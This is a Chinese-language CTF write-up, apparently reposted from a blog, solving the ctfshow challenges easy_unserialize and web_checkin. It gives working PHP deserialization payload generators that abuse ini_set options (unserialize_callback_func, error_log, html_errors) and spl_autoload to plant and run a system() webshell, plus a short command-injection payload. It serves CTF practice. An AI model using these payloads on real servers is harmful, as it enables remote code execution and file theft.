CTFSHOW-日刷-[大牛杯]-web-easy_unserialize/web_checkin
作者:互联网
easy_unserialize
简单分析可以发现是反序列化,还有ini_set。
发现默认写入setting.inc,写入的内容还要在反序列化一次。
非预期解:
先看ini_set可以设定的值里有一个error_log
这里代表报错信息会写入我们设定的文件里。
那么怎么构造脚本错误呢,这里利用unserialize_callback_func
比如上图,反序列化A,但是文件里没定义A,那么反序列化就会尝试调用aaa()函数,同时会把类名作为参数传入到aaa里,所以会输出A(类名)
那么我们这里将aaa改成system不就能命令执行了吗,但是参数要是类名,类名只能字母数字和下划线,我们没法输入 / 。
但是我们注意到要是你没定义aaa会报错输出aaa,那么我们定义aaa为php代码,然后报错写入上面我们写入的php文件即可
但是本地测试发现:
尖括号转义了,查询资料可知,ini_set 的'html_errors'=>false可以取消转义
payload:
<?php class A{}; class main{ public $settings; public $params; public function __construct(){ $this->settings=array( 'unserialize_callback_func'=>'<?php system("cat /f*");?>', 'error_log'=>'error.php', 'html_errors'=>false ); $this->params=serialize(new A()); } } $b=new main(); print_r(urlencode(serialize($b)));
预期解:
用spl_autoload函数,它是__autoload()的一个默认实现,自动加载类
主要看他会加上.inc,因此一开始我们写入settings.inc目标php语句
再执行该函数,包含settings.inc
payload:
写入
<?php class settings{ } class main { public $settings; public $params; public $a; public $b; public function __construct() { $this->params=serialize( array( '1'=>'<?php system("cat /f*");?>' ) ); } } echo urlencode(serialize(new main()));
包含:
<?php class settings{ } class main { public $settings; public $params; public $a; public $b; public function __construct() { $this->settings=array( "unserialize_callback_func"=>"spl_autoload", ); $this->params=serialize(new settings()); } } echo urlencode(serialize(new main()));
web_checkin
payload:?><?=`nl%09/*`,用剩下的字母组合即可,记得把前面先闭合短标签来输出即可
标签:web,aaa,大牛杯,settings,checkin,serialize,写入,unserialize,new 来源: https://www.cnblogs.com/aninock/p/15459418.html